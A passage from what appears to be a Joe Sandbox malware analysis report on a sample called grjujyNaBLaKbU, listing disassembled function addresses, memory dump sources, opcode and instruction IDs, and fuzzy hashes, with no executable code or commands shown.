                                                                        • Opcode ID: 64113a4be23dfea6b02381b9d8045d475b899413e620640624f7f0e49d7ed71e
                                                                        • Instruction ID: b761e3adb7571abbc385ae5d70aeb617147107ea747b2623b1567961c1336a90
                                                                        • Opcode Fuzzy Hash: 64113a4be23dfea6b02381b9d8045d475b899413e620640624f7f0e49d7ed71e
                                                                        • Instruction Fuzzy Hash: E00108B8A142098FCB14DFA9D6585ECBBB7FF88302B20452DE416AB747DB305881CF51
                                                                        Function 00D1D758 Relevance: .0, Instructions: 36COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1742253625.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_d1d000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb1de2df9c07d2ad9c8f4dd19d17863b6e3dc92a488334575c4844ea43d6140f
                                                                        • Instruction ID: 6601888d191dfa825084e948bec86df703a7d487802a88c7484387002f5cfea3
                                                                        • Opcode Fuzzy Hash: fb1de2df9c07d2ad9c8f4dd19d17863b6e3dc92a488334575c4844ea43d6140f
                                                                        • Instruction Fuzzy Hash: 6FF06272404344AEEB208A16DC84BA2FFA8EF51734F18C55AED094B286C3799C84CAB1
                                                                        Function 082032D0 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 863583ebebdda710dff732a3ac94e6b253a7101403bc70feffa25219274b4b86
                                                                        • Instruction ID: 45f8ad82d9f0f9ae152c1677149693ae0ab47ff9ebfde2d40d9b83dccc9007fe
                                                                        • Opcode Fuzzy Hash: 863583ebebdda710dff732a3ac94e6b253a7101403bc70feffa25219274b4b86
                                                                        • Instruction Fuzzy Hash: A0F0FF74E14109AFCB44DFACC5456AEFBF4EB45304F10899AD814E3341DB759A01CF90
                                                                        Function 082043B0 Relevance: .0, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1f029b06f0b5ec94b99211dc0cd3311e395c1b9ab8fd2732b0e1de9c750d0766
                                                                        • Instruction ID: 6b293a384561d663db0d3eb218644e7d86bfb64d93a09d7ed837828e4e09a1b1
                                                                        • Opcode Fuzzy Hash: 1f029b06f0b5ec94b99211dc0cd3311e395c1b9ab8fd2732b0e1de9c750d0766
                                                                        • Instruction Fuzzy Hash: ABF0CD74D0920A9FCB05CFACC8001EEBFB0AF45305F1481AAE85497292DB308A02CF40
                                                                        Function 0820592C Relevance: .0, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4dafba4454d28a9b8c70fa9c9fc98ee1c15611011d8fe20c8d7fad90592098fb
                                                                        • Instruction ID: 7e8388f8d30c38a2383af95d1b7e45c7c688299d3a5f42cb5af24ada6ee9ad36
                                                                        • Opcode Fuzzy Hash: 4dafba4454d28a9b8c70fa9c9fc98ee1c15611011d8fe20c8d7fad90592098fb
                                                                        • Instruction Fuzzy Hash: B6F08231610108BF9F08DF9CD88099E7BEAEF44324B10816AE504E7251E631A9108F94
                                                                        Function 08207F50 Relevance: .0, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 86f75688bb6770da9eccde6bd585489dc4987dc3dcc88fc26e94ce6af933cff4
                                                                        • Instruction ID: 5f8b53b3014079d835803e9a8db7b3a6da4c8962e2a6887d149b15e977141068
                                                                        • Opcode Fuzzy Hash: 86f75688bb6770da9eccde6bd585489dc4987dc3dcc88fc26e94ce6af933cff4
                                                                        • Instruction Fuzzy Hash: C0F0E7B4E1420EAFCB04DFADC9055AEBBF4BB48301F1085699818E3381EB70AA00CF51
                                                                        Function 082043C0 Relevance: .0, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 01eb05ebf172513585b95086daab5f3f0c2db6691a552db297ff8e2efe046ed1
                                                                        • Instruction ID: 8275522f946b934f607bcfcfdb6dd026cebec18ca05c1f0fc5feb71c1deef923
                                                                        • Opcode Fuzzy Hash: 01eb05ebf172513585b95086daab5f3f0c2db6691a552db297ff8e2efe046ed1
                                                                        • Instruction Fuzzy Hash: F1F0F9B4D1520ADFCB04DFADD9415AEBBF4BB48305F1085A9D818E3341EB709A11CF95
                                                                        Function 08203D30 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 56fa0f13b618b289bdeb67cb46a9f6624e21537ff3e22953cfff5f26a1251632
                                                                        • Instruction ID: 406e0b75fffd823a6b639663443a2d3165664724ada176f825b08f274e1e5083
                                                                        • Opcode Fuzzy Hash: 56fa0f13b618b289bdeb67cb46a9f6624e21537ff3e22953cfff5f26a1251632
                                                                        • Instruction Fuzzy Hash: B3F0A4B8D2420DAFCB44DFADC5495ADBBF4AB08201F0099AAD818E3351E7705640DF40
                                                                        Function 082083D8 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d2c58f4a5023c79f9f0c3250188a1c68fc3b549a3082c4df0db55438a872874a
                                                                        • Instruction ID: 54839078a476808a395307cbf0ebaaf3d40559449baedf7138db08aa2eda800f
                                                                        • Opcode Fuzzy Hash: d2c58f4a5023c79f9f0c3250188a1c68fc3b549a3082c4df0db55438a872874a
                                                                        • Instruction Fuzzy Hash: BCF0B7B4D24209EFCB44DFADD9455AEBBF4EB48301F0099BAD818E3341E77056508F41
                                                                        Function 0820CAE0 Relevance: .0, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 661a388fa98303692234deda2293eb63b885b7fb4eb1677c266f582cc62b13b8
                                                                        • Instruction ID: c3ae655f8c011830b05387db04f9ae106cd4796e7070b95bcec8f3a7550b5692
                                                                        • Opcode Fuzzy Hash: 661a388fa98303692234deda2293eb63b885b7fb4eb1677c266f582cc62b13b8
                                                                        • Instruction Fuzzy Hash: 53F090F091420AEFCB10DFBCC946ADE7FF1AB04221F148665E424DB292E7B586029F80
                                                                        Function 0820F998 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 486026a12cdd8c3463846c48b5f5f46c9d924de951a8fb81deebf5d71972e215
                                                                        • Instruction ID: f698888a5fb3142773e9347ed38bc9c9ea349fd2dd7b7dd00c899fc435cd3652
                                                                        • Opcode Fuzzy Hash: 486026a12cdd8c3463846c48b5f5f46c9d924de951a8fb81deebf5d71972e215
                                                                        • Instruction Fuzzy Hash: EDF0B431914288AFCB12CFBCD4146DDBFF0EF4A311F1481C6E9A45B3A2C6301A52EB12
                                                                        Function 0820CB48 Relevance: .0, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ace02b750cf0ce83d62fce7048e19e85d5f934613aecfbaea7c5db22b9e242aa
                                                                        • Instruction ID: 662adb0cdb09b7d4210607129b4a9a26125d026de3c8d92a091fb473b1d53a4f
                                                                        • Opcode Fuzzy Hash: ace02b750cf0ce83d62fce7048e19e85d5f934613aecfbaea7c5db22b9e242aa
                                                                        • Instruction Fuzzy Hash: E9F0B7B0D1420A9FDB44DFA9D846AAEBBF4AB48200F1086AAD918E7341D77096008F91
                                                                        Function 0820A2A0 Relevance: .0, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f86e8ef0b1935477aac790309faf7db594a769235c84554a2d0eccf5913cd2de
                                                                        • Instruction ID: fa9c3c4bd4c90d0611fbb9f9c0f9607f2a57195adbc52a2409e04e7725bb72cf
                                                                        • Opcode Fuzzy Hash: f86e8ef0b1935477aac790309faf7db594a769235c84554a2d0eccf5913cd2de
                                                                        • Instruction Fuzzy Hash: D6E0D17145C3984FD705129EAE4DBD83F70D703317F94025BD11DD64D3E69148994B71
                                                                        Function 08208508 Relevance: .0, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 98c5c200cd423393aa305db419c8b1b0c341481319ffec2725bed7462ef4905c
                                                                        • Instruction ID: 95545e53a96020496e4864c2389ee04229486fbac022a80c94f223356981b5af
                                                                        • Opcode Fuzzy Hash: 98c5c200cd423393aa305db419c8b1b0c341481319ffec2725bed7462ef4905c
                                                                        • Instruction Fuzzy Hash: 3CF06D70D24208EFCB44DFBCD8456AEBFF4AB09201F1085B9D848E3241E7704A40CF01
                                                                        Function 0820BD8E Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0718901336627500f0a6e2d536add5eff13267abd69193495753f5024eec9cbc
                                                                        • Instruction ID: c01ece330d9856b2ee4b728a11f30fc28867d989ff461b167af2ff6113714a80
                                                                        • Opcode Fuzzy Hash: 0718901336627500f0a6e2d536add5eff13267abd69193495753f5024eec9cbc
                                                                        • Instruction Fuzzy Hash: 01F08C3152C188CFC7088B68D8D88A4BB7AFF4A242B4100E6E50A9B263CB714915CF20
                                                                        Function 0820E549 Relevance: .0, Instructions: 25COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e07431ca91813f25e3a8ef647998237a3a5795c80c88e1c79d41f1c61bd4a1f9
                                                                        • Instruction ID: c986f3efdbb7afad48338e106d4a08a0ab745e02954cf0a2d0b4ec46df4f0a6e
                                                                        • Opcode Fuzzy Hash: e07431ca91813f25e3a8ef647998237a3a5795c80c88e1c79d41f1c61bd4a1f9
                                                                        • Instruction Fuzzy Hash: 14F034B49156498FC758DBA5CA147E8BBB6FF89301F0085AAD10ABB647DB300E808F60
                                                                        Function 0820F9A8 Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 995d0137b882ddf3819304cadd01e59a6529a2fa6fc87cf15c07a06c7c65fbc2
                                                                        • Instruction ID: 9faf600fac7972b7704ec9bf59368bc53005b4cb1917775ed454863ed9895785
                                                                        • Opcode Fuzzy Hash: 995d0137b882ddf3819304cadd01e59a6529a2fa6fc87cf15c07a06c7c65fbc2
                                                                        • Instruction Fuzzy Hash: 0CF03975D0020CFBCB14EFADE4056CCBBB5EB48301F10C0AAA918A3340DA305A60DF51
                                                                        Function 08205FBD Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 957222bf87d0dfdeb9c38f0e8c80051786ce3261c8acbaa8a8efacb7cb2787f1
                                                                        • Instruction ID: 4c7cff35343029093804fee494cdf07d31e036f37179c5487d8dc118d7bd99bd
                                                                        • Opcode Fuzzy Hash: 957222bf87d0dfdeb9c38f0e8c80051786ce3261c8acbaa8a8efacb7cb2787f1
                                                                        • Instruction Fuzzy Hash: 5DE02632C00128A7CB01AAECCE096EFFF78DF01550B404516E504BB201D3304910CFC0
                                                                        Function 08204E90 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 675594e290994774abcb01c2ad435e7af4d43630574f9111aa619f372172541f
                                                                        • Instruction ID: 0306e1d7141cf920c4a1d3f75fffb393d6f1291230001ff9498eb8a195a88340
                                                                        • Opcode Fuzzy Hash: 675594e290994774abcb01c2ad435e7af4d43630574f9111aa619f372172541f
                                                                        • Instruction Fuzzy Hash: 2EE08C34825109ABCB04FEA888086AE7AF8AB0120AF908598D80553381DBB01A949F86
                                                                        Function 0820BF04 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2ee75f186e73c5a20bcf32ee63defb5bbd6d2213375df7ed56be74889d8b5007
                                                                        • Instruction ID: 6e3a235cb1a239b1054f4ab49a37ec28d0aaef4d406215d2947a139493eb3a65
                                                                        • Opcode Fuzzy Hash: 2ee75f186e73c5a20bcf32ee63defb5bbd6d2213375df7ed56be74889d8b5007
                                                                        • Instruction Fuzzy Hash: 65E03234829010CFDB18DF5CC8898A9BBB9FF45311B0190E2E80A5B296CB30B940CF61
                                                                        Function 0820BE78 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2344c1bfb737a528354c91ddea69a1c9027eabbd26c8ccf21ab2b1d5feb1c500
                                                                        • Instruction ID: d30265052561c05c525aa25c4e34b0a5bbfb68a5c0f6245c04855d8ce32c27b0
                                                                        • Opcode Fuzzy Hash: 2344c1bfb737a528354c91ddea69a1c9027eabbd26c8ccf21ab2b1d5feb1c500
                                                                        • Instruction Fuzzy Hash: 21E08631518108CFC7048B98D8855947774FF46352B0110E3D5099B152CB315915DF20
                                                                        Function 0820CAF0 Relevance: .0, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 563f3fa3359acdeb0b5895f63b5329aaf3d761b543fd6be5587c34a64ba0c684
                                                                        • Instruction ID: 17d739bd31c3abb8e178cf2edb66831e618286b2d0359c0c9641fd79b4ccad7a
                                                                        • Opcode Fuzzy Hash: 563f3fa3359acdeb0b5895f63b5329aaf3d761b543fd6be5587c34a64ba0c684
                                                                        • Instruction Fuzzy Hash: 31E0B6F0D5020ADFD740EFBDC905A5EBBF4BF08200F1185A9D019E7266E7B49A048F91
                                                                        Function 082055D0 Relevance: .0, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3fd3cdef37011a0943fb095f14fdfaf13a21ef6871771db26efd69f63218c631
                                                                        • Instruction ID: 484a1ab6ccc8d29d79aff9ac32f97fe71d4304adefb025243dc50648577fda60
                                                                        • Opcode Fuzzy Hash: 3fd3cdef37011a0943fb095f14fdfaf13a21ef6871771db26efd69f63218c631
                                                                        • Instruction Fuzzy Hash: 19D023670145814EF7163204CC094203F25FA7110D325C483D4C1D9073F4104C169F17
                                                                        Function 08205FC8 Relevance: .0, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                                                        • Instruction ID: 9eefffb9c4e6713a14d9d00fe3371b2d10197e1369e5c3cf918431f92417940f
                                                                        • Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                                                        • Instruction Fuzzy Hash: DDD05E72C00138978B10AFE9DC084DFFF78EF05650B418122E915A7100D3700A20CFC0
                                                                        Function 0820CBE8 Relevance: .0, Instructions: 14COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5bbee54225ff4541b46551fdde237a3ade7660542ef5b5c61ae903e1de4157f9
                                                                        • Instruction ID: 43b2145132302d19f7ad90a640dc87f578600e6beba319c1a201da12f2b25bc9
                                                                        • Opcode Fuzzy Hash: 5bbee54225ff4541b46551fdde237a3ade7660542ef5b5c61ae903e1de4157f9
                                                                        • Instruction Fuzzy Hash: 80D0123615010C9E8B40EE9DE800D57BBDCBB147007408432F509CB532EA21E535EB51
                                                                        Function 0820A2B0 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c2db722a1487b4601a0655b83b0189054695acf63cdcd24896b3c171b28ab1a1
                                                                        • Instruction ID: 419237ed8c366821754b1c0843498a2b35315eeaf38faeebf1bd595a52ce06e8
                                                                        • Opcode Fuzzy Hash: c2db722a1487b4601a0655b83b0189054695acf63cdcd24896b3c171b28ab1a1
                                                                        • Instruction Fuzzy Hash: A5C08C310606088BC308279EF90E7E43FA8EB02303F800124F00E028534EA104A0CFB1
                                                                        Function 0820A6AB Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa2e6ef48aaeab90984e313018b387d7c4548fb9fe7504d552724a2f04db0a42
                                                                        • Instruction ID: a4aa81273aff16ed4d7be2ba11337579ab938096ef670a74bf5665ddfbcf4216
                                                                        • Opcode Fuzzy Hash: fa2e6ef48aaeab90984e313018b387d7c4548fb9fe7504d552724a2f04db0a42
                                                                        • Instruction Fuzzy Hash: 35D0C970911229CFDB15EF28EC8AF88BBB2FB05305F104695E00A67251DB702EC4CF41
                                                                        Function 0820AE4E Relevance: .0, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dcb2398376cb74b0d92b5f133ebe7e83f34c45a4699f4dc4cf71c3fdce029a4e
                                                                        • Instruction ID: 64557dbec50d8bbd26471554714973272081a48a63372613d0a96eb0c2bed898
                                                                        • Opcode Fuzzy Hash: dcb2398376cb74b0d92b5f133ebe7e83f34c45a4699f4dc4cf71c3fdce029a4e
                                                                        • Instruction Fuzzy Hash: 95D0C974D28148CBCB04DFA8E0540DCBFF0EA093017048059D415AA646CA3169068F00
                                                                        Function 082058E4 Relevance: .0, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1752745244.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_8200000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: deaf2aa10a7e93ab157c429af801a29da3e5007fb28221e6bac4a4c9997a34d9
                                                                        • Instruction ID: 68e639321618c6e13ae87eb28de2e87cc2def1914a65cc73427868272b551c21
                                                                        • Opcode Fuzzy Hash: deaf2aa10a7e93ab157c429af801a29da3e5007fb28221e6bac4a4c9997a34d9
                                                                        • Instruction Fuzzy Hash: 11B01279179100B6530463FC49C0B3F6452EBB5B11B508C0273441608286A25824DF6B

                                                                        Executed Functions

                                                                        Function 014817E8 Relevance: 4.2, Strings: 3, Instructions: 449COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $tq$$tq$$tq
                                                                        • API String ID: 0-2863945821
                                                                        • Opcode ID: 1af6eff1258c3c2ef09fdf13cfb34496a9e283cb2ba2d707e1ca7fa89d3baa0e
                                                                        • Instruction ID: 905b71624c482e77efba199b5a6f20d99e6385bb7ef2e85542f654bcb990eedc
                                                                        • Opcode Fuzzy Hash: 1af6eff1258c3c2ef09fdf13cfb34496a9e283cb2ba2d707e1ca7fa89d3baa0e
                                                                        • Instruction Fuzzy Hash: CFF1C0747002158FDB1DAB7AD868B2E7BA3BFC8750F104529E5169B3E8DF749C428B90
                                                                        Function 014817D8 Relevance: 2.8, Strings: 2, Instructions: 336COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_1480000_grjujyNaBLaKbU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $tq$$tq
                                                                        • API String ID: 0-1837209516
                                                                        • Opcode ID: 268ee29f7fd085f6b969ac650ec9cbb8b73d75db90c7967c1cbc80cb9f75e009
                                                                        • Instruction ID: d606216640e3728c25307cd46ba4bf42c6df24517a3144a367f0d10e6d870eca
                                                                        • Opcode Fuzzy Hash: 268ee29f7fd085f6b969ac650ec9cbb8b73d75db90c7967c1cbc80cb9f75e009
                                                                        • Instruction Fuzzy Hash: F1C1AF747002168FDB1DBB36D86472E7BA3BB88750F104529E5169B3A8EF749C42CB91
                                                                        Function 014818CA Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.1755098221.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
